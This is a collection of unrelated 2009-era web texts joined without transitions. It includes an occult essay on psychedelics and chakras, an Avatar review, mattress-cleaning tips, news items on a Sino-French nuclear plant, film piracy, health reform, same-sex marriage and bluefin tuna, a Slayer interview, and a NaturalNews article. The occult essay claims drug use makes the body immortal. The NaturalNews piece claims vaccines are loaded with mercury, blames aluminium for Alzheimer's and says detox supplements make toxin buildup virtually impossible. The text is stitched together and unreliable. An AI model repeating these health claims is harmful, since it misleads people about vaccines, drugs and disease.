Remember at all times that God exists in you in the form of your own power of attention and that power when properly directed , will control all lesser forces .
It is believed by some researchers that psychedelic drugs stimulate the secretion process of the pineal and pituitary glands , which are known by yogis and occultists to be related to the Sahasraram and Agna chakras ( which are also called the Thousand - Petalled Lotus and the Third Eye Center ) .
This stimulation increases the flow of energy between the etheric body and the physical body .
It may be that psychedelic drugs place the cells of the physical body under stress so that they must speed up their activity to overcome the stress .
When the cells increase their activity , their vibratory rates increase , thus putting them harmonically in resonance with the higher rates of vibration on the subtle superphysical planes of energy .
This process makes possible the expression of a higher level of consciousness through the glandular system , brain and nervous system .
The increased physical cellular activity requires more work and activity in the etheric body to sustain the stepped - up activity of the physical body .
The vibratory rate of the etheric body is thus accelerated , requiring an increased activity in the astral body to sustain and remain harmonically in tune with the etheric body .
The increased vibratory rate of the astral body requires a stepped - up activity and increased vibratory rate in the mental body .
This in turn more fully tunes the mental body in to the power , love and wisdom of the soul .
Thus an alignment of the whole being on all planes is facilitated , and a more rapid exchange of pattern imprints and energy between the various octaves or planes of energy takes place .
It may also be that psychedelic drugs have a chemical structure such that they are perfectly in resonance with the lower overtones of certain key frequencies in the higher planes and can therefore act as a point of entry for the reflection of these vibrations in the physical body .
They would therefore help to create common node points in the vibration structure of several different dimensions .
Not only is the love , wisdom and power of the soul brought to bare in the life of the personality , but the fine organization of the physical body , the etheric , astral and mental bodies , which have been produced by the evolutionary process , are harmonically reflected and preserved in the soul .
While the physical body is the least permanent , the densest and composed of the substance of the lowest plane , it is in terms of evolution , the newest and most highly organized in terms of structure .
Therefore , a complete replica of it made out of the energy substance of the subtle planes , is an evolutionary gain for the soul and subtle bodies .
When the physical body is sufficiently vivified by the influx of energy from the higher dimensions , it begins to create higher overtone reflections of itself in the akasha or energy substance of the higher planes , and thus its pattern is preserved and made immortal .
Therefore , when properly used , psychedelic drugs help to speed up the evolutionary process .
When man has evolved to superman , he will , under the direction of the superconscious mind in accordance with God 's will as it manifests in evolution , take an active part in the molding and directing of the evolution of the mineral , vegetable , and animal kingdoms .
Even today , his vibrations intimately affect for good or bad , those kingdoms in nature .
A paraplegic marine sent to a new planet , armed with a virtual body , to ingratiate himself with locals in order to gain their trust and subsequently destroy them ?
Sounds like the plot of a bad sci - film film .
But as it turns out , it 's the plot of a highly entertaining sci- fi film – that being , of course , Avatar , one of the most anticipated films of recent years .
We know a lot about Avatar – that it 's James Cameron first in fifteen years , that it 's the first to use 3D in this way .
But strip the hype aside and what anyone wants to know is – is it any good ?
And can you watch it without feeling ill ?
The first is easy .
Avatar emerged at last night 's premiere as rather good .
Paraplegic marine Jake Sully ( Sam Worthington ) is a last - minute recruit on a mission to the alien planet , Pandora , which boasts incredible quantities of a mineral that is worth a lot of money to earthlings .
The invading humans are led by two factions – the scientists , headed by Sigourney Weaver 's Grace , who are seeking to learn and understand more about the alien species in a bid to relocate rather than obliterate the natives , and the warriors led by Colonel Quaritch ( Stephen Lang ) , who are looking for all - out massacre .
The factions have been brought together by Administrator Parker Selfridge ( the ever wonderful Giovanni Ribisi ) , there for one reason only – to bring the brilliantly named , and insanely valuable unobtanium back to Earth .
Download the new Independent Premium app Sharing the full story , not just the headlines
Sully and Norm ( Joel Moore ) are drivers of the eponymous avatars ; bodies that have been constructed out of the more sturdy natives , spliced with humans .
The logistics of how it all works takes some getting used to ; but suffice to say the scene where Sully awakens in avatar form is a real delight .
It would be easy to assume Cameron drew inspiration from other films of the same ilk but to generalise like that does Avatar , and Cameron a disservice .
For starters , one assumes that he was developing Avatar while other seminal films of the past decade were still on the slate .
There are shades of detail , and of background – the nuances of the language the native Na'vi speak ; the realisation of the animal inhabitants ; the history of the clan – which all reinforce the impression that you get from any film that you know has taken 15 years to make : it is a real labour of love .
What 's more , his decision to make Avatar in 3D was a risky one – and it 's paid off in spades .
As with most 3D films , less is more .
Surprisingly , for a film this rich in action and this beautiful to watch , Cameron does n't overegg the 3D - ness of it all , which makes those moments , when they come , even more of a joy to watch .
However , that 's not to say that 130 minutes in 3D is n't sometimes overwhelming .
Glasses were being taken off , and eyes rubbed for brief intervals around the cinema .
Whether this is simply a product of an audience unused to watching movies in this way , rather than a flaw in the production , will remain to be seen as 3D becomes more and more commonplace .
What Avatar does mark is a new breed .
A new breed of action film , a new hero in Sam Worthington ( who delivers a much more believable , and compelling performance than previous outings ) and a new cinematic experience .
For every cliche – every colonel telling his troops that they 're " not in Kansas anymore " , every fight beginning with trash talk like " Let 's dance " , there are myriad moments of beauty and of poignancy .
And the final battle is worth the price of your 3D glasses alone .
Maintaining your mattress in a good condition is important if you want to sleep well and be healthy .
Some of the things you need to do to prolong the life cycle of your mattress are to flip it two times a year , wash and change your sheets every week and to keep it clean .
The latter can be difficult as they are too many myths on mattress cleaning that have been circulating for decades .
It ’s time to debunk them !
Mattresses do n’t need to be cleaned
False !
Not cleaning your mattress will not only wear it out faster than the usual , but it will also mean that you will sleep over a colony of bugs , dust mites and microbes every single night .
That does not sound nice , does it ?
Therefore , thoroughly sanitise your mattress at least once every year .
Also , clean it from dust every week or every month .
By doing so you will greatly improve your sleep .
If not , you may develop serious allergies , respiratory conditions and weaken your immune system .
All you need is a vacuum cleaner
Vacuuming your mattress is a great way to clean it since that wo n’t damage its structure and it will effectively remove the dust from it .
Still , it will clean only its surface and it will leave things like fungi , pollen and mould to exist in peace and harmony .
Therefore , do not be afraid to use cleaning supplies that were specially created for this purpose .
Do n’t forget to read the label of the product and that on the mattress itself to see whether they will make a good match .
You can also use home - made solutions .
Baking soda or hydrogen peroxide can do wonders .
Water is also acceptable but in very moderate amounts .
Otherwise , your mattress may never recover from its bath .
Sunlight can damage the mattress
Another common misconception about mattresses is that they should be kept away from sunlight .
In reality , there is no truth in that .
The sun will cause no damage .
In fact , it is advised to take the mattress outside and leave it for a while .
In that way , the moisture in it will evaporate and the fresh breeze outside will work like a natural ventilation .
Yes , mattress moisture is a real thing and it is caused by body perspiration , high room humidity and etc .
You will never remove the bad odours
Once smelly , always smelly is not a phrase that can be used for mattresses .
A bad odour can easily spoil your sleep but it wo n’t be the end of the world as it can be removed .
Again , baking soda is a great solution for that .
Just sprinkle it over the bed and leave it for half an hour .
Then , vacuum it and repeat in case you can still smell the unpleasant aroma .
For even better results , mix the baking soda with a few drops of your favourite essential oil before you sprinkle it .
Turn those myths into facts and – voila – your mattress will be as good as new !
Posted by : Monster Cleaning Brixton
Chinese Vice Premier Li Keqiang addresses the launch of Taishan nuclear power plant in Beijing , capital of China , Dec. 21 , 2009 .
Li Keqiang and Fillon commenced the construction of Taishan nuclear power plant here Monday , a Sino - French joint project in south China 's Guangdong Province . ( Xinhua / Huang Jingwen )
Chinese Vice Premier Li Keqiang ( R ) and visiting French Prime Minister Francois Fillon attend the launch of Taishan nuclear power plant in Beijing , capital of China , Dec. 21 , 2009 .
Li Keqiang and Fillon commenced the construction of Taishan nuclear power plant here Monday , a Sino - French joint project in south China 's Guangdong Province . ( Xinhua / Huang Jingwen )
Visiting French Prime Minister Francois Fillon addresses the launch of Taishan nuclear power plant in Beijing , capital of China , Dec. 21 , 2009 .
Chinese Vice Premier Li Keqiang and Fillon commenced the construction of Taishan nuclear power plant here Monday , a Sino - French joint project in south China 's Guangdong Province . ( Xinhua / Huang Jingwen )
Chinese Vice Premier Li Keqiang and visiting French Prime Minister Francois Fillon attended a ceremony marking the official start of construction of the Taishan nuclear power station Monday .
The ceremony also marked the establishment of the biggest Sino - French new energy joint venture to construct and operate the first - phase project of the Taishan nuclear power station , in south China 's Guangdong Province .
According to China Guangdong Nuclear Power Holding Co. Ltd. ( CGNPC ) , the joint venture , Guangdong Taishan Nuclear Power Joint Venture Company Ltd. , has a registered capital of about 16.7 billion yuan ( 2.5 billion U.S. dollars ) .
Electricite de France holds a 30 - percent stake and CGNPC 70 percent .
During the ceremony , Chinese Vice Premier Li Keqiang said the project would significantly deepen Sino - French economic and trade relations .
The attendance of the two leaders reflected the importance the two countries attached to enhancing nuclear energy cooperation , CGNPC chairman Qian Zhimin said at the ceremony .
Fillon is on his first official visit to China since taking office .
He is also expected to meet Chinese President Hu Jintao , top legislator Wu Bangguo and Premier Wen Jiabao .
Zachary Quinto and Chris Pine played Mr Spock and James T Kirk in Star Trek
The latest Star Trek film was illegally downloaded more than 10 million times in 2009 , according to an internet blog site that monitors file - sharing .
The figures suggest it is 2009 's most pirated film , ahead of Transformers sequel Revenge of the Fallen .
Guy Ritchie 's RocknRolla was the third most pirated movie , with The Hangover and Twilight completing the top five .
The TorrentFreak blog reports on peer - to - peer activity which uses BitTorrent file - sharing software .
BitTorrent is one of the most popular means of transferring large files over the internet .
Other films featured in the list of most illegally downloaded titles include sci- fi thriller District 9 and the sixth Harry Potter adventure .
But X - Men Origins : Wolverine ranks fairly low in the Top 10 , despite an unfinished version of the film appearing online ahead of its release .
Directed by JJ Abrams , Star Trek charted the early days of James T Kirk , Mr Spock and other crew members of the Starship Enterprise .
UPDATE : A well - placed source says Amazon and Vente - Privee have had talks in the past year but does not believe that Amazon is about to buy the company .
That does n't preclude a deal at some point , obviously , especially with Amazon 's stock price in the stratosphere .
EARLIER : Amazon is in talks to acquire French private sales company Vente - Privee for around $ 3 billion , Mike Butcher at TechCrunch Europe reports .
We asked Xavier Court , marketing director at Vente - Privee , on the record if Amazon had acquired Vente - Privee .
His response was “ Very flattering but not true at all . ”
However , our sources say that although the two companies have not yet agreed anything , they are in fact negotiating a price close to 2 billion Euros , or $ 3.01 billion .
In October we learned that Vente - Privee was looking for a sale of between $ 2 billion and $ 4 billion .
Read the whole report →
Vente - Privee was the inspiration for Gilt Groupe , a US - based private - sale company founded two years ago that should do $ 300 + million of revenue next year .
Private sales are a great business , but the secret is out : Vente - Privee , Gilt , et al , have spawned dozens of competitors .
If Amazon does buy Vente - Privee , it will be interesting to see what happens with Gilt .
Vente - Privee is strong in France .
Amazon will likely want to also be strong in the U.S. and elsewhere .
Amazon could do that by trying to import Vente - Privee ... or by also buying Gilt or another US player .
Disclosure : Our co-founders , Kevin Ryan and Dwight Merriman , also co-founded Gilt .
For almost 30 years , Kerry King has been a member of Slayer , a band that transcended its thrash - metal beginnings and became one of the most respected rock groups in the world .
Sharing guitar duties with Jeff Hanneman , King helped develop the hyper - speed tremolo - picking style , blistering guitar solos , and intimidating tightness that are Slayer trademarks .
The burly , tattooed King , with his shaved head and his signature B.C. Rich KKV guitar , is a menacing figure well known for giving terse , frank interviews , and he has publicly feuded with more than a few contemporaries .
The week Slayer ’s latest album , World Painted Blood , was released , he spoke to The A.V.
Club about the making of the album , the band ’s relationship with its fans ( and non-relationship with producer Rick Rubin ) , and what he thinks of his own achievements .
Advertisement
The A.V. Club :
Do you feel that World Painted Blood is a return to Slayer ’s “ classic ” period , or a progression from Christ Illusion ?
Kerry King : I just think it ’s funny that people always try to analyze it , and do n’t just dig it for what it is .
When people say it ’s a return to the ’ 80s , I say , “ Well , what was Christ Illusion ?
What was God Hates Us All ? ” I know the ’90s were weird , but this decade , we ’ve been really solid .
I think this record ’s really cool ; it ’s got more variety than anything we ’ve done in quite some time .
And before you ask the question , it was n’t planned that way .
That ’s just how it came out .
Advertisement
AVC : What did producer Greg Fidelman bring to the mix ?
KK : Greg was cool , man .
I hope he does every record for us until we ’re done , if he has time and we have time .
He ’s more like a fifth member of the band , and he ’s really in tune with what we were trying to do as far back as the late ’ 80s .
Advertisement
AVC : So he was really hands - on ?
KK : Yeah , he was there every fuckin’ day for us .
He was the last one to leave every day , and that ’s inspiring .
It earns you respect .
It ’s cool .
Advertisement
AVC : How are things between you and Rick Rubin ?
There was a lot of tension around the time of Christ Illusion because he decided to produce Metallica instead .
KK : I have n’t seen the dude in years .
People ’s perception is that because he ’s the executive producer on our records , that we see him — I have n’t seen that dude in fuckin’ years .
Essentially , at the end of the day , that title means “ I own the record label . ”
He ’s got final say over the mix , and that ’s that .
Advertisement
AVC : When Christ Illusion came out , and “ Jihad ” was the first single , you commented about how it was the “ Angel Of Death ” controversy all over again .
Did that factor into the decision to make “ Psychopathy Red , ” about Russian serial killer Andrei Chikatilo , the first single from World Painted Blood ?
KK : No .
That was the only song that was done .
[ Laughs . ]
AVC : This was the first album in which you were still working on material when you went into the studio .
Did that change things much ?
Advertisement
KK : Not really .
That was kind of a weird , different thing , but it ’s only because we put ourselves in that position .
We ’d already confirmed the Mayhem tour , which was last summer , and we had to have our record either done , or done and out , or else we ’d have had no time to finish it .
AVC : Did it feel rushed to you ?
KK :
It was definitely rushed , but I do n’t feel it was detrimental to the record overall .
Everything just happened to work — it was one of those magical recording sessions .
Advertisement
AVC : Some of your leads on World Painted Blood are phenomenal , and you ’re playing with Jeff in ways that sound really new .
Did you deliberately alter your playing style at all , or did it just evolve this way ?
KK : I think it ’s just the way it came about , but seeing as we recorded it in such a short fashion , that lent itself to making a more diverse - sounding record .
We were self - conscious , I guess , of all the songs sounding different ; when you write an album over a long period of time , you do n’t have the problem of worrying about things sounding similar to one another .
Here , I wrote all my material in like six weeks .
So there was a very big chance that songs could end up sounding too similar .
We did n’t want that at all , so we worked together and made up approaches and riffs that we ’d never even tried before .
When we were in the studio , I would sometimes have a riff that I was n’t really sure about , so I ’d just go in there and mess around with it , see what kind of reaction I got .
Like , the main “ Americon ” riff , I took it in there , and every time , people were all , “ What ’s that ? ”
Finally , Dave [ Lombardo ] got up , ran and played some drums for it , and I thought “ Well , fuck , I guess we ’re gonna use it . ”
Advertisement
AVC : Groups as established as Slayer get pressure from some critics to keep moving forward , and from some fans to keep sounding the same .
Does any of that motivate you one way or another ?
KK : I think first and foremost , we were fans before we were Slayer , and that carries over into today .
I think if we like it , then our fans are going to like it , because in a way , we ’re just an extension of them .
We ’re just four dudes who make each other better .
I think that ’s the main difference between us and most bands .
There ’s a lot of guitar players out there in bands that are never going to make it ; they might be better than us , but number one , they were n’t in the right place at the right time , and number two , they never find people that make them better , or share the same ideas .
It ’s really a crapshoot .
Advertisement
AVC : Do you pay much attention to critics at all ?
KK : Not really .
I was reading one article about the new album , and the guy was asking if it was a burden to be in Slayer .
And then you have guys talking about how great the album is , and how much they love it , and then they still give you 8 out of 10 because they expect more out of us .
That blows me away .
Advertisement
AVC : Is it annoying to have every record you put out described in terms of a comeback ?
KK :
It just makes me wonder , “ What did you think of our last two ? ” [ Laughs . ]
AVC : How ’s the tour going ?
KK : It ’s going great .
We ’re back on the road a week from tomorrow .
AVC : How ’s Tom Araya ’s voice ?
You had to cancel a show because he was having problems .
Advertisement
KK : Yeah , it happens .
I think historically , we ’ve only had to cancel about three or four shows , so it ’s not something that happens all the time .
But unfortunately for Adelaide , Australia , their show was the one that got pulled .
[ Since this interview , Slayer cancelled the Canadian leg of its current tour so Araya could be treated for a back injury .
— ed. ]
AVC : Do you still enjoy touring ?
KK : Oh , there ’s nothing better than the stage .
The worst thing about touring is the travel .
I do n’t care how many business - class or first - class seats you got , travel fuckin’ wears you out .
But we still love playing live .
Advertisement
AVC : Have you developed different standards for what constitutes a good show than you had when you were starting out ?
KK : I do n’t think so .
Maybe one difference is that now we can afford to do cooler things .
We ’ll do some fire , some pyro from time to time .
It ’s an expensive thing , so when you ’re at an earlier point in your career , you weigh the options and say “ I do n’t want to spend all my money on a couple of big bangs . ”
But this year , when we did the Mayhem tour , we split the cost of the pyro guy with Marilyn Manson as a way to get our feet wet with it .
Advertisement
AVC : On that topic , has technology overall been a good thing for the band over the years ?
KK : Well , it ’s definitely made recording easier .
Of course , you still go through and record every one of your parts , but with ProTools , it makes it so much easier than it was 10 years ago .
It seems like every time we go into the studio , there ’s a new thing to make it easier .
Much as I hate recording , I have to say , it ’s so much easier than it was when we started out .
Advertisement
AVC : Do you stay on top of that stuff yourself ?
KK : That ’s the engineer ’s job .
We pay him to know all that stuff so we do n’t have to .
Advertisement
AVC : After 25 - plus years , what keeps you artistically interested ?
KK : I do n’t know if it ’s just me personally , but I ’m still a fan .
I have tons of friends in the heavy - metal music world , and just going to see them inspires me .
If I ’m ever feeling uninspired , all I have to do is go see Exodus or Arch Enemy , and think “ Oh yeah , that ’s what we ’re doing this for . ”
We ’re definitely a generation - jumper as far as fans are concerned ; there ’s no rhyme or reason to it , but it ’s pretty cool .
Advertisement
AVC : Is the metal scene better today than when you started ?
KK : Yeah , because when we came through the first time , we were part of the creation of what we ’re doing now .
And now that we ’ve laid all this groundwork , I think it ’s a lot easier for bands .
Especially with the Internet … I remember in the old days , when we were promoting a show , we ’d be out taping flyers to high - school lockers .
Now you just announce the show online , and it ’s a full house .
Advertisement
AVC : Do you often give much thought to your legacy , or about what Slayer has meant to the metal scene ?
KK : Not really .
I do n’t reflect much , unless I ’m talking to the media .
I have more of a “ Forward , march ! ” kind of attitude .
Advertisement
AVC : Is there anything you feel like you still have left to accomplish , anything you have n’t done that you still want to do as an artist ?
KK : Not to sound like an asshole , but no .
The only thing that ’s really different now from the late ’ 80s and early ’90s is that you used to judge yourself by gold records and stuff like that .
Sure , we had gold records — I do n’t think there ’ll ever be a time when we get them again , just because of the way that music is sold and traded now , but I ’ve played some of the biggest shows in the world , and headlined most of them .
And it seems like every album , we end up visiting a new country , which is cool .
As far as goals , I honestly can’t think of any .
Advertisement
AVC : There have been a lot of rumors that you ’re planning to do World Painted Blood and two more , then call it quits .
Is there anything to that ?
KK : I think that ’s a case of journalists taking the ball and running a little too far with it .
I ’ll be the first to admit that I ’m not 25 anymore , but I ’d also be the first to tell you that I ’m having a damn fucking good time .
Of course , a lot of it depends on our recording schedule ; I think a lot of this started to come around because it took us five years to do Christ Illusion after God Hates Us All .
But what people are missing is that during that period , we had the War At The Warfield and Still Reigning videos , and we had a box set , and an EP .
And every one of those products , even though it ’s not a new album , that put us to work and had us out on tour .
But we took five years between records , and I know Tom and I both said “ Well , if we take five years between each record , we might only have one or two left in us . ”
But these last ones , we did in only three years , and I think if we keep on a more frequent release schedule …
We ’ll see .
When it ’s done , it ’s done .
It ai n’t gonna be like Kiss .
Our last tour is gonna be our last fuckin’ tour .
Remembering Obama 's campaign health - care plan
" Though the American left and right do n't agree on much , " wrote Frank Rich over the weekend , " they are both now coalescing around the suspicion that Obama 's brilliant presidential campaign was as hollow as Tiger 's public image . "
It 's hard to imagine why .
The health - care bill that looks likely to clear the Senate this week is not very close to the health - care bill most liberals want .
But it is very close to the health - care bill that Barack Obama promised .
Thanks to the magic of Google , it 's easy enough to revisit the plan ( pdf ) Obama campaigned on in light of the plan that seems likely to pass .
And there are , to be sure , some differences .
The public option did not survive the Senate .
The individual mandate , which Obama campaigned against , was added after key members of Congress and the administration realized that the plan would n't function in its absence .
Drug reimportation was defeated , and a vague effort to have government pick up some catastrophic costs was never really mentioned .
But the basic structure of the proposal is remarkably similar .
Here 's how it was described in the campaign 's white paper :
The Obama - Biden plan provides new affordable health insurance options by : ( 1 ) guaranteeing eligibility for all health insurance plans ; ( 2 ) creating a National Health Insurance Exchange to help Americans and businesses purchase private health insurance ; ( 3 ) providing new tax credits to families who ca n’t afford health insurance and to small businesses with a new Small Business Health Tax Credit ; ( 4 ) requiring all large employers to contribute towards health coverage for their employees or towards the cost of the public plan ; ( 5 ) requiring all children have health care coverage ; ( 5 ) expanding eligibility for the Medicaid and SCHIP programs ; and ( 6 ) allowing flexibility for state health reform plans .
We do n't know what the employer mandate will look like once the House and the Senate merge their bills , and the exchanges look likelier to be run by states or regions than by the government ( though there will also be a national exchange overseen by the Office of Personnel Management ) , but those are really the only differences .
And it 's not even clear they 're differences .
Nor were there aggressive cost controls outlined in Obama 's white paper but abandoned amid the legislative process .
The Senate bill is quite a bit stronger on controlling costs than the campaign paper , which makes no mention of prudential purchasing or the excise tax on high - cost health insurance or the Medicare Commission or specific delivery - system reforms .
The paper promises investments in comparative effectiveness research and health information technology , and the Obama administration delivered on both in the stimulus .
But whether you love the Senate bill or loathe it , whether you 're impressed by Obama 's effort or disappointed , it is very hard to argue that the bill Congress looks likely to pass is fundamentally different from the approach Obama initially advocated .
" The Obama - Biden plan both builds on and improves our current insurance system , " the campaign promised , and on that , for better or for worse , they 've delivered .
You can debate whether Obama should have lashed himself to such an incremental and status - quo oriented approach , but you cannot argue that he kept it a secret .
Photo credit : AP Photo / Gerald Herbert .
( CNN ) --
The New Jersey Senate is expected to vote Thursday on a bill that would legalize same - sex marriage in the state .
The bill cleared the Senate 's Judiciary Committee on Monday evening by a vote of 7 - 6 , state Democratic officials said .
If the bill is approved by the full Senate , it would move next to the state Assembly .
The bill would have to be passed this month to stand a chance of being signed into law .
Republican Gov.-elect Chris Christie , who takes office next month , has said he would veto it .
Outgoing Democratic Gov. Jon Corzine has vowed to sign it .
" This is an action that is long overdue , " Corzine said in a written statement Monday after the bill passed committee .
" For far too long , a large segment of our population has been denied the fundamental rights and protections of a civil liberty that is granted to all Americans .
" I am confident that through this process , the marriage equality issue will be recognized for what it truly is -- a civil rights issue that must be approved to assure that every citizen is treated equally under the law , " he said .
Same - sex marriage is legal in Connecticut , Iowa , Vermont and Massachusetts and will become legal next month in New Hampshire .
The nation 's capital moved a step in that direction , when the city council passed on December 1 the first of two votes required to send a same - sex marriage proposal to the desk of Mayor Adrian Fenty .
Fenty has vowed to sign the bill .
Last week , the New York state Senate killed a similar bill after it had passed the state Assembly .
In November , voters in Maine rejected same - sex marriage after Gov. John Baldacci signed the measure into law .
Kai-fu Lee , ex-president of Google China , is known for being well - connected with Apple manufacturing partner Foxconn , and lately he 's been blogging about the Apple Table .
Apparently it looks like a big iPhone with a webcam and an incredible user interface .
Advertisement
According to Gadget Mix 's translation of Lee 's microblog :
The Apple Tablet looks like a bigger iPhone that sports an awesome UI packed in a beautiful 10.1 - inch screen .
The tablet combines the functions of both netbook and kindle , an ebook reader .
It has virtual keyboard for text entry and a webcam for video conferencing
Advertisement
This information confirms what we 've heard so far and Lee 's connections make him rather believable .
So the fact that he adds that Apple will be making 10 million units of this tablet in the first year indicates high expectations for the launch , whenever it may come .
[ Kai - Fu Lee via Gadget Mix via Engadget ]
7572750 story
shift writes " I 've used multiple monitors for years ( currently 3 ) and find that Linux is lacking in power tools for such setups .
Even Windows 7 has added the feature to move a window from screen to screen with keyboard shortcuts .
Are any of the major desktop environments adding such features ?
I 'm still stuck on FVWM and have defined functions to swap the contents of screens as well as move windows from screen to screen and so on .
But this just seems like such basic functionality people would want in multi-screen setups that I 'm surprised I do n't find any of these features in our latest desktop environments . "
... you have been able to create weapons with your bare hands , using raw steel , in real life .
What if we were to tell you there ’s now a way to SIMULATE that in - game ?
Introducing Team Fortress 2 ’s new Crafting system .
Say goodbye to those enjoyable evenings spent complaining on the forums about which item in your inventory was the most useless , spraying anti-Australian racist hate speech all over Robin Walker , his lovely wife , and his beautiful children .
EVERYTHING in your inventory now contributes towards something you actually WANT , and can build YOURSELF !
If you ’re super clever , you ’ll even be able to craft new items before others can earn them the old fashioned way .
If you thought all those duplicate hats and weapons in your inventory were incredibly useful before , man , were you wrong !
You were also in the quiet minority , if the forums were any indication .
What , you could n’t have posted a single sentence about how much you loved your crappy inventory ?
You ’re killing us here .
We ’re flesh and blood people , not useless - item - creating machines .
By Richard Black
Environment correspondent , BBC News website
The bluefin is highly prized for many dishes , notably sushi
Banning trade in Atlantic bluefin tuna is justified by the extent of their decline , an analysis by scientists advising fisheries regulators suggests .
The International Commission for the Conservation of Atlantic Tunas ' ( ICCAT ) advisers said stocks are probably less than 15 % of their original size .
The analysis has delighted conservation groups , which have warned that over - fishing risks the species ' survival .
ICCAT meets to consider the report in 10 days ' time .
The analysis was triggered by Monaco 's recent proposal to ban international trade in the Atlantic bluefin under the Convention on International Trade in Endangered Species ( CITES ) - a proposal that has gathered support from several other European countries .
ICCAT 's track record is n't too good , but they could surprise us
Dr Sue Lieberman
Pew Environment Group
" What 's needed to save the stocks is a suspension of fishing activity and a suspension of international commercial trade , " said Sergi Tudela , head of fisheries with the environmental group WWF for the Mediterranean region .
" We must stop mercilessly exploiting this fragile natural resource until stocks show clear signs of rebound and until sustainable management and control measures are firmly put in place . "
The body charged with regulating catches of the southern bluefin , a closely related species , has just approved 20 % quota cuts across the board .
Quota excesses
For a number of years , ICCAT has set quotas higher than scientists ' recommendations .
The pressure this puts on stocks has been compounded by illegal fishing for this valuable species , which according to some estimates adds 30 % to the official quota .
Last year , an independent report concluded that ICCAT 's management of tuna was a " disgrace " , blaming member countries for not accepting scientific advice and for turning a blind eye to their fleets ' illegal activities .
Casting a net to the future
The report recommended interim closure of the Mediterranean fishery , where most bluefin are caught - a measure that won backing from the US .
Frustrated by what it saw as ICCAT 's inability to control the problem , Monaco 's government - supported by conservation groups - submitted its CITES proposal .
The proposal will be heard at the CITES meeting in March .
If enacted and enforced , it would severely hamper the trade .
Atlantic bluefin tuna are mainly caught from countries around the Mediterranean Sea , but most of the meat is consumed in Asia , particularly Japan .
Japan has previously argued that commercial fish species should be controlled by bodies like ICCAT rather than CITES .
" The right thing would be to impose a zero quota , " said Sue Lieberman , director of international policy for the Pew Environment Group .
" It would n't be forever - stocks will recover , but not at current rates of catch . "
The bulk of the catches come from purse seine boats in the Mediterranean
ICCAT 's scientific committee considered different ways of analysing the decline - whether to start from estimates of how many bluefin there were before industrial fishing began , or from the largest stocks reliably recorded , and according to different rates of reproduction .
They concluded that whichever way the data is cut , it is 96 % likely that numbers in the east Atlantic and Mediterranean are now less than 15 % of their pre-industrial - fishing size .
CITES guidance suggests this would trigger a trade ban for a slow - reproducing fish species .
For the western Atlantic stock , subject to much smaller catches , the figure is 93 % likely .
At its forthcoming meeting in Brazil , ICCAT delegates will decide whether to place new restrictions on catches .
" ICCAT 's track record is n't too good , " commented Dr Lieberman , " but they could surprise us . "
Usually , ICCAT makes reports such as this one publically available .
But because of its " controversial and politically - charged nature " , the commission asked members to " consider refraining from distributing this report " before the Brazil meeting , and it is not clear if and when it will be posted on the organisation 's website .
Richard .
Black-INTERNET@bbc.co.uk
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Remember Be Here Now
The bestsellerby Ram Dass was a gift my dad gave my mom Christmas of 1971 .
I felt like an elementary school beginner hippie / mystic , reading it in our home in Eugene , Oregon .
I would get one of my father 's ties and wear it as a headband while thumbing through the natural looking brown unbleached pages .
Not far away , on campus , U of O students vigorously demonstrated against the Vietnam War , occasionally with small explosive devices .
Ram Dass introduced me to eastern thought early .
Coming to fully embrace that " everyone is a manifestation of God and that every moment is of infinite significance " has been a goal since .
Many people spend less than 1 % of their time living in the present .
Our fast pace and busy minds have us dwelling in memories of the past , or anticipating future events .
But the present is where everything is happening .
It is where you can be the authentic you and experience life at its fullest , unencumbered by regret or anticipation .
When we observe our thoughts we can see by their content which time frame we are living in .
Living fully now is the goal .
Always gently bring yourself back to the moment .
When washing the dishes , wash the dishes .
Being mindful of the moment has many benefits .
Time slows down , and you feel calm .
You are sharp , clear , and ready for any scenario .
You are open and energetic .
As a good friend says , " Life is fun .
" There is more .
You become less responsive to emotional triggers , and feel in control of yourself .
You connect easily with others .
Your interactions are meaningful and sincere .
You respond to situations in a logical , fair manner .
You have confidence .
You are you , genuine and unafraid .
First we have to recognize we are trapped .
Then we can work on becoming free .
When you live in the moment , everything changes .
Remember .
Be here now .
( NaturalNews )
A recent German study published in the journalrevealed a definitive link between prolonged inhalation of automobile fumes and inflammation of the brain .
An analysis of a group of women found that those who lived closest to busy roads were the most likely to develop memory problems and mild cognitive impairment , indicating the potential onset of fume - induced dementia .
The group from Heinrich - Heine University in Dusseldorf constructed models that measured air pollution and the location of the womens ' homes in proximity to roads that were travelled by more than 10,000 cars in a day .
Findings revealed that , among women under age 74 , those that lived the closest to the busy roads performed the worst on cognition tests .
Since mild cognitive decline can indicate either a transition between normal aging and dementia , further research and follow - up with the women was emphasized .
Alzheimer 's disease is one of the most widely recognized forms of dementia and researchers continue to investigate its causes .
It is widely accepted that air pollution particles are so small that they are able to pass through the lungs and make their way into the brain .
As a result , the brain tissue becomes inflamed and cognitive decline begins to occur .
By crossing the blood - brain barrier and lodging themselves in the brain , these particulates are the primary suspect in causing cognitive dysfunction .
Toxic heavy metals such as aluminum and mercury act similarly in that they build up in the body , particularly in the brain , and cause serious problems .
Antiperspirant deodorants , baking sodas , food additives , and vaccines commonly contain aluminum derivatives that many claim are the perpetrators in causing brain disorders like Alzheimer 's disease .
Vaccines are also often loaded with mercury .
Industry must also strive to develop cleaner forms of energy that cause less of a negative impact upon people .
Particularly with automobiles , clean fuel technologies are of critical importance since vehicle exhaust is known also to induce asthma , chronic obstructive pulmonary disease , cardiovascular disease , cancer , and diabetes .
One would do best to live as far away from busy roads and polluted areas as possible and to integrate an ongoing detoxification regime into his or her lifestyle .
By continually ridding the body of lodged toxins with supplements such as chlorella , spirulina , and garlic , the potential for excessive toxin buildup is virtually impossible .
By perpetually cleansing the body , it will be better able to fend off harmful disease despite inevitable exposure to various toxins .
Somehow my Secret Santa knew I had just started using zip - ties !
I have a sweet system in which i zip - tie my iPhone to my bike 's handlebars when I ride .
I 'm sure these will come in handy .
Online retailer may be on target for sales of 500,000 Kindle e-readers over Christmas
This article is more than 10 years old
This article is more than 10 years old
Spare a thought for the humble hardback this Christmas .
It seems the traditional giftwrapped tome is being trumped by downloads , after Amazon customers bought more e-books than printed books for the first time on Christmas Day .
As people rushed to fill their freshly unwrapped e-readers – one of the top - selling gadgets this festive season – the online retailer said sales at its electronic book store quickly overtook orders for physical books .
Its own e-reader , the Kindle , is now the most popular gift in Amazon 's history .
Amazon 's shares rose sharply today after it updated investors on a strong Christmas performance .
On its peak day , 14 December , the retailer said customers ordered more than 9.5 m items worldwide , the equivalent of a record - breaking 110 items a second .
